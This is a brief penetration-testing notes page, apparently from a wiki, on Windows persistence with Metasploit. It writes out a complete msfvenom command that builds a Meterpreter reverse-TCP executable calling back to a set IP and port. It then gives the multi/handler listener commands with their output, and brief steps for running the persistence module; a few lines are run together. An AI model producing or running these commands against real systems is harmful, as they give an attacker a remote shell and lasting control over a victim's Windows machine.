Persistence
Metasploit
Use msfvenom to create the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exemsf > use exploit/multi/handlermsf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpRun listener
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461
Background session
Use persistence module
Set background session
Run persistence

Last updated